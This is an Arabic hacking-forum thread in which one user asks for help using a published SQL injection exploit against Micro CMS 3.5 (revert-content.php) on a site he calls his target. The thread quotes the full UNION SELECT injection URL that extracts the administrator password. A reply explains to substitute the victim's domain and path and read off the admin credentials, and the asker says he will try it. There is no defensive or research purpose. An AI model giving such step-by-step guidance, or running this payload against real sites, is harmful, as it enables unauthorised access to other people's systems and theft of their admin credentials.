|
رجاء شرح استغلال Micro CMS 3.5 (revert-content.php) بسم الله الرحمن الرحيم انا كنت عملت موضوع سالت فيه عن استغلال السغرة Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability ولكن يبدو اني قد اخطاءت في طريقة السوال فان اقصد شرح الاستغلال مثال http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SE LECT%20null,null,SUBSTRING(administrators_pass,1,1 6),null,null%20FROM%20microcms_administrators/* ================================================== ================================================== ================================================== ====================================== هذا هو الاستغلال site.com= الموقع المصاب فماذا يقصد ب newest=؟ او بمعني اخر كيفيتة تريكب السغرة ارجو اضافة موقع علي الثغرة وكافة المتغيرات بحيث استطيع فهم السغرة ووضع متغيرات موقعي المستهدف:detective2: وشكرا لكم |
رد: رجاء شرح استغلال Micro CMS 3.5 (revert-content.php) اقتباس:
xxxxxxxxxxx.com = اسم الموقع /xxxxxx/ = مسارات على الموقع (اسماء مجلدات) الفكره بالثغره هنا اذا لقيت موقع مركب السكربت الي اسمو Micro CMS 3.5 كل ما عليك تستببدل من الرابط فوق site = حط بدالها اسم الموقع [micro_cms] = مسار السكربت ( قد لا يلزم وقد يكون مثلا /home/ او /index/ او /site/ كل موقع يختلف عن الاخر الباقي لا تغير فيه شيء وافتح الرابط المفترض تلقى باسورد الادمن واليوزر قدامك لو فهمت علي ^_^ في حال ما فهمت شو قصدي مشكلتك مش بالهاك مشكلتك انك ما بتعرف كيف بنيه المواقع او انك عمرك ما ركبت موقع وكان شرط اساسي من شروط دوراتنا انك تكون امتلكت موقع ولو مجاني وانت تركبه بنفسك وكذاا الصعود الى القمه يبدا خطوه بخطوه بالتوفيق |
رد: رجاء شرح استغلال Micro CMS 3.5 (revert-content.php) مشكور كتير ورااح اجربي وارجعلك تاني يا كبير شكرااااااا |
| الساعة الآن 04:02 AM |
[ vBspiders.Com Network ]